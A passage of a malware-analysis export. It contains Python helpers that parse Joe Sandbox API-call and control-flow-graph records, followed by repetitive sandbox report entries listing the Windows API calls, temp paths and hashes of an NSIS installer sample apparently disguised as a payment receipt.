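TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)  # assumption: user %TEMP% layout


def parse_api_line(line):
    m = API_RE.match(line)
    if not m:
        return None
    raw = m.group("args").strip()
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {
        "api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref").upper(),
        "subcall": m.group("sub").upper() if m.group("sub") else None,
        "args": args,
        # anything that is neither an immediate nor '?' is a string Joe resolved from memory
        "strings": [a for a in args if a and a != "?" and not HEX8_RE.match(a)],
    }


def parse_api_block(text):
    return [r for r in (parse_api_line(l) for l in text.splitlines()) if r]


def temp_paths(records):
    """Unique file-system paths under %TEMP% that appeared as API arguments."""
    out = []
    for r in records:
        for s in r["strings"]:
            if TEMP_RE.search(s) and s not in out:
                out.append(s)
    return out


def parse_cfg(line):
    """Token stream: '<id> <start>[-<end>]' opens a basic block; 'call <hex>' and bare API
    names attach to the open block, '* N' repeats the previous callee; '<a>-><b>' is an edge."""
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            a, b = t.split("->")
            edges.append((int(a), int(b)))
        elif t.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = int(t)
            lo, _, hi = toks[i + 1].partition("-")
            blocks[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16), "calls": []}
            i += 1
        elif t == "call":                       # internal callee, named sub_<addr> here
            blocks[cur]["calls"].append("sub_" + toks[i + 1].upper())
            i += 1
        elif t == "*":                          # e.g. 'call 406507 * 2'
            blocks[cur]["calls"].extend([blocks[cur]["calls"][-1]] * (int(toks[i + 1]) - 1))
            i += 1
        else:                                   # imported API name
            blocks[cur]["calls"].append(t)
        i += 1
    return blocks, edges


def blocks_calling(blocks, name):
    return sorted(i for i, b in blocks.items() if name in b["calls"])


def reachable(blocks, edges, entry):
    """Block ids reachable from `entry` along the recorded edges (BFS)."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    seen, queue = {entry}, deque([entry])
    while queue:
        for n in succ[queue.popleft()]:
            if n not in seen:
                seen.add(n)
                queue.append(n)
    return seen


SAMPLE_APIS = r"""
• lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017B0
• CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,?,00000031), ref: 004017D5
  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
• lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
"""

# Constructed excerpt: real block ids and addresses from the 00406544 record, edges trimmed.
SAMPLE_CFG = (
    "control_flow_graph 442 406544-40654f 443 406551-406560 442->443 444 406562-406578 "
    "442->444 443->444 449 40659f 444->449 494 40669b-4066b1 SHGetSpecialFolderLocation "
    "449->494 497 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 494->497 "
    "490 4066e3-4066e9 lstrcatW 497->490 471 406742-406750 lstrlenW 490->471 "
    "472 406735-40673d call 406544 471->472 467 406713-40671f call 406507 * 2 472->467"
)

if __name__ == "__main__":
    recs = parse_api_block(SAMPLE_APIS)
    print("imports:", sorted({r["api"] for r in recs}))
    print("%TEMP% paths:", temp_paths(recs))
    blocks, edges = parse_cfg(SAMPLE_CFG)
    print("blocks calling SHGetSpecialFolderLocation:", blocks_calling(blocks, "SHGetSpecialFolderLocation"))
    print("reachable from entry 442:", sorted(reachable(blocks, edges, 442)))
```

Run it on the full exported record rather than the excerpt by feeding the whole control_flow_graph line to parse_cfg and the "APIs" section to parse_api_block; the "Part of subcall function" prefix is kept in the subcall field so that APIs attributed to callees (here lstrcpynW in 00406507) are not counted as direct calls of the function being read.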

Control-flow Graph
• Function 00405569-00405639 (entry 00405569). Imports called from its blocks: lstrlenW, lstrcatW, SetWindowTextW, SendMessageW. Internal callees: 00406544. (Basic-block graph not reproduced.)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                    • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                    • lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                    • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                      • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                    • String ID: Completed
                                                                                                                                                                                    • API String ID: 1495540970-3087654605
                                                                                                                                                                                    • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                    • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8

Control-flow Graph
• Function 004032B4-00403496 (entry 004032B4). Imports called from its blocks: GetTickCount, MulDiv, wsprintfW. Internal callees: 00403499, 004034AF, 00405569, 004060A9, 00406A2F, 00406A4F. (Basic-block graph not reproduced.)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: ... %d%%$G8@
                                                                                                                                                                                    • API String ID: 551687249-649311722
                                                                                                                                                                                    • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                    • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Control-flow Graph

control_flow_graph (rendered figure; edge list not reproduced): function at 406864, basic blocks 406864-4068d1; API calls GetSystemDirectoryW, wsprintfW, LoadLibraryExW
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
• wsprintfW.USER32 ref: 004068B6
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
• Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
• Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Control-flow Graph

control_flow_graph (rendered figure; edge list not reproduced): function at 405a38, basic blocks 405a38-405ab2; API calls CreateDirectoryW, GetLastError, SetFileSecurityW, GetLastError
APIs
• CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
• GetLastError.KERNEL32 ref: 00405A8F
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
• GetLastError.KERNEL32 ref: 00405AAE
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3449924974-3081826266
• Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
• Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
• Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
• Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Control-flow Graph

control_flow_graph (rendered figure; edge list not reproduced): function at 406026, basic blocks 406026-406078; API calls GetTickCount, GetTempFileNameW
APIs
• GetTickCount.KERNEL32 ref: 00406044
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-678247507
• Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
• Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
• Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
APIs
  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes,?,00000000,000000F0), ref: 0040164D
Strings
• C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes, xrefs: 00401640
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes
• API String ID: 1892508949-2682595351
APIs
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
• RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
                                                                                                                                                                                    • Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                                    • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                    • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                    • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                    • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
• Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
• Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
• Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
